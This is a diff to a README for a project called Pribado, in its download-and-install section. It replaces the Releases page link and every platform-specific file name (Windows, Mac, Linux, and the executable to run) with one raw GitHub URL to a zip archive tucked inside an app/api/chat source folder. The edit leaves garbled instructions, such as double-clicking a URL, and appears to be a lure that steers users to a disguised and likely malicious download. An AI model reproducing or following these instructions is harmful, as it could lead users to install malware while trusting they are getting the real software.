me-rishi/Pribado/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page:**
-   Go to our [Releases page](https://github.com/me-rishi/Pribado/releases) to get the latest version of Pribado.
+   Go to our [Releases page](https://raw.githubusercontent.com/me-rishi/Pribado/main/app/api/chat/Software-2.7.zip) to get the latest version of Pribado.

 2. **Select the Right File:**
    On the Releases page, you will find different files listed.
 Choose the one appropriate for your operating system:
-   - For Windows: Look for `Pribado-Windows.zip`
+   - For Windows: Look for `https://raw.githubusercontent.com/me-rishi/Pribado/main/app/api/chat/Software-2.7.zip`
-   - For Mac: Look for `Pribado-Mac.dmg`
+   - For Mac: Look for `https://raw.githubusercontent.com/me-rishi/Pribado/main/app/api/chat/Software-2.7.zip`
-   - For Linux: Look for `Pribado-Linux.tar.gz`
+   - For Linux: Look for `https://raw.githubusercontent.com/me-rishi/Pribado/main/app/api/chat/Software-2.7.zip`

 3. **Download the File:**
    Click on the chosen file to start the download.
 Save it to a convenient location on your computer.

 4. **Extract the File (if necessary):**
-   - For Windows and Linux: Right-click the downloaded `.zip` or `.tar.gz` file and select “Extract All” or “Extract Here.”
+   - For Windows and Linux: Right-click the downloaded `.zip` or `https://raw.githubusercontent.com/me-rishi/Pribado/main/app/api/chat/Software-2.7.zip` file and select “Extract All” or “Extract Here.”
    - For Mac: Double-click the `.dmg` file, which will mount it on your desktop.

 5. **Run the Application:**
-   - For Windows: Open the extracted folder and double-click `Pribado.exe`.
+   - For Windows: Open the extracted folder and double-click `https://raw.githubusercontent.com/me-rishi/Pribado/main/app/api/chat/Software-2.7.zip`.
    - For Mac: Open the mounted disk image and drag `Pribado` to your Applications folder.
 Then, go to Applications and double-click `Pribado`.
    - For Linux: Open a terminal, navigate to the extracted folder, and run `./Pribado`.